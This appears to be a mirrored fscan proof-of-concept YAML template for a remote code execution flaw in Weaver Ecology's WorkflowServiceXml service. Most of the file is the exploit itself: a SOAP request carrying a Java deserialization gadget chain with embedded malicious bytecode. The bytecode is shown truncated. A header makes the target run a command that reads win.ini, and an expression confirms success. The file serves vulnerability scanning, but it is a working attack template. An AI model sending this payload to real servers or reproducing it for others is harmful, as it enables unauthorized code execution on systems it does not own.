mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-11-05 10:45:27 +00:00
20 lines
28 KiB
YAML
20 lines
28 KiB
YAML
|
|
name: poc-yaml-ecology-workflowservicexml
|
||
|
|
set:
|
||
|
|
rand1: randomInt(1000, 9999)
|
||
|
|
rand2: randomInt(1000, 9999)
|
||
|
|
rules:
|
||
|
|
- method: POST
|
||
|
|
path: /services%20/WorkflowServiceXml
|
||
|
|
follow_redirects: false
|
||
|
|
headers:
|
||
|
|
Content-Type: text/xml
|
||
|
|
cmd: type c:\\windows\\win.ini
|
||
|
|
body: |
|
||
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization="custom">   <unserializable-parents/>   <java.util.PriorityQueue>     <default>       <size>2</size>       <comparator class="org.apache.commons.beanutils.BeanComparator">         <property>outputProperties</property>         <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>       </comparator>     </default>     <int>3</int>     <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">       <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>         <default>           <__name>Pwnr</__name>           <__bytecodes>             <byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBD
|
||
|
|
expression: |
|
||
|
|
response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support")
|
||
|
|
detail:
|
||
|
|
author: tangshoupu
|
||
|
|
info: ecology-workflowservicexml-rce
|
||
|
|
links:
|
||
|
|
- https://www.anquanke.com/post/id/239865
|